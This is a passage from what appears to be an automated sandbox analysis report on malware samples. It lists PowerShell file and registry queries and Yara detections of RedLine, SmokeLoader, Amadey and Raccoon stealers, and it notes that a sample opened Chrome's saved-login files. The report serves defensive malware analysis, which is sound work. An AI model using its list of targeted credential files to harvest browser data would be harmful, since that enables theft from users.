Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe Code function: 0_2_00421A60 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00421A60
Source: C:\Users\user\AppData\Local\Temp\20BD.exe Code function: 20_2_6AB94020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 20_2_6AB94020

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match File source: 11.2.9A4B.exe.2cc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.F7E3DjYJpC.exe.2d215a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.2fa0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.20BD.exe.2fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.1.9A4B.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.20BD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.1.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.F7E3DjYJpC.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.iwbavbe.2bc15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.iwbavbe.2c515a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.iwbavbe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.F7E3DjYJpC.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.1.iwbavbe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.888009215.0000000002C40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.876148906.0000000004C51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.873601079.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741479676.0000000000451000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.726672116.00000000044E1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807321223.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.807649884.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.890437795.00000000047D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.741456691.0000000000420000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.845161453.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Raccoon Stealer
Source: Yara match File source: 27.3.5483.exe.48d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.3.5483.exe.48d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000003.879658236.00000000048D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5483.exe PID: 6408, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5483.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.937590546.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.932395754.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.928126221.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Yara detected Raccoon Stealer